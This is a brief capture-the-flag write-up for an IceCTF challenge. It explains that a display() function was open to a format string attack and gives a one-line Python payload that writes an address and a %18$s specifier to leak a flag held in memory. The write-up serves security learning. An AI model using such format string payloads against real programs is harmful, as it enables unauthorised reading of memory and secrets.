IceCTF
Ok this question was easy if u can find the vulnerability .. it took me 1 to 2 hrs to find it .. the vulnerable part was in display() func ..
It was vulnerable to format string attack and the flag is opened ,read and stored in a string all u have to do is leak it ..
python -c 'print "1\n"+"\xa0\xa0\x04\x08"+"-%18$s""\n"+"2\n"+"3\n"'